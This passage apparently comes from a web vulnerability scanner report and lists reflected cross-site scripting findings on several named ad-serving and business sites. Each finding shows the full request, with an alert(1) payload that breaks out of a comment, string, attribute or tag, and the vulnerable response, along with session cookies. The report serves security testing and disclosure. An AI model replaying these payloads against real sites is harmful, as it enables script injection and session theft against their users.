Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=885768&ps=-17aee0--><script>alert(1)</script>b7befdbe7d1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3954


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-17aee0--><script>alert(1)</script>b7befdbe7d1" -->
   
...[SNIP]...

4.84. http://ads1.revenue.net/j [r_num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The value of the r_num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773cd'%3balert(1)//8a6389b8181 was submitted in the r_num parameter. This input was echoed as 773cd';alert(1)//8a6389b8181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537773cd'%3balert(1)//8a6389b8181 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:57 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CACl2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzc3M2NkJzthbGVydCgxKS8vOGE2Mzg5YjgxOFgGDDowOjEzMDUyNDQ0OTc6MbABBDAxMjk3Oi0pBAAHMTMwNTIwMTI5NxEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537773cd';alert(1)//8a6389b8181&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169&">
...[SNIP]...

4.85. http://ads1.revenue.net/j [site_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The value of the site_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2f3e'%3balert(1)//3c32c462e94 was submitted in the site_id parameter. This input was echoed as a2f3e';alert(1)//3c32c462e94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /j?site_id=12169a2f3e'%3balert(1)//3c32c462e94&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:56 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CADt2OjE6MToxMjE2OWEyZjNlJzthbGVydCgxKS8vM2MzMmM0NjJlOTQ6MjI3MjQ1OjM0NDA6NTg0Mzc1Mzc6MTowOjEzMDUyNDQ0OTY6MbABBDAxMjk2Oi0pBAAHMTMwNTIwMTI5NhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169a2f3e';alert(1)//3c32c462e94&">
...[SNIP]...

4.86. http://adserving.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abf19'-alert(1)-'e26e9738d4e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0abf19'-alert(1)-'e26e9738d4e&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:34 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=0x0abf19'-alert(1)-'e26e9738d4e&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdU
...[SNIP]...

4.87. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2af3e'-alert(1)-'acaaadb8c74 was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=02af3e'-alert(1)-'acaaadb8c74&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:12 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=02af3e'-alert(1)-'acaaadb8c74&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kG
...[SNIP]...

4.88. http://adserving.cpxinteractive.com/st [pop_times parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 415c8'-alert(1)-'0163bb86c01 was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1415c8'-alert(1)-'0163bb86c01&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:04 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1415c8'-alert(1)-'0163bb86c01&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pR
...[SNIP]...

4.89. http://adserving.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ae4f'-alert(1)-'10d8742ce91 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=17487132ae4f'-alert(1)-'10d8742ce91&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:42 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=17487132ae4f'-alert(1)-'10d8742ce91&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4Ux
...[SNIP]...

4.90. https://ams-legal.net/support/Login.asp [userid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/Login.asp

Issue detail

The value of the userid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e187d"><script>alert(1)</script>9ba0e3ea2194d98f4 was submitted in the userid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /support/Login.asp?newPassword=1&userid=e187d"><script>alert(1)</script>9ba0e3ea2194d98f4&password= HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 3024
Content-Type: text/html
Expires: Thu, 12 May 2011 12:33:05 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...
<input id="userid" name="userid" type="text" value="e187d"><script>alert(1)</script>9ba0e3ea2194d98f4" onFocus="window.status='Required field. Please enter your user ID';" />
...[SNIP]...

4.91. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706 was submitted in the REST URL parameter 3. This input was echoed as 31754<img src=a onerror=alert(1)>d4c46211706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706/5000//20110401-102631?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:49 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3527
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");


}({
accountId : "AENDU0IN29GG31754<img src=a onerror=alert(1)>d4c46211706",
internalId : "",
customField : "20110401-102631",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes :
...[SNIP]...

4.92. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a was submitted in the REST URL parameter 5. This input was echoed as 472fe<img src=a onerror=alert(1)>4d759b0f60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:11 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3551
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");


}({
accountId : "AENDU0IN29GG",
internalId : "",
customField : "20110401-102631472fe<img src=a onerror=alert(1)>4d759b0f60a",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes : "http://cgiwsc.enhancedsitebuilder.com:80/cgi",
productId
...[SNIP]...

4.93. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732 was submitted in the REST URL parameter 3. This input was echoed as dbb84<img src=a onerror=alert(1)>c65bf2df732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGdbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732/7008/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:10 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGdbb84<img src=a onerror=alert(1)>c65bf2df732,7008,16420]

4.94. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8 was submitted in the REST URL parameter 4. This input was echoed as 380e8<img src=a onerror=alert(1)>95c2f9acef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:24 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008380e8<img src=a onerror=alert(1)>95c2f9acef8

4.95. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
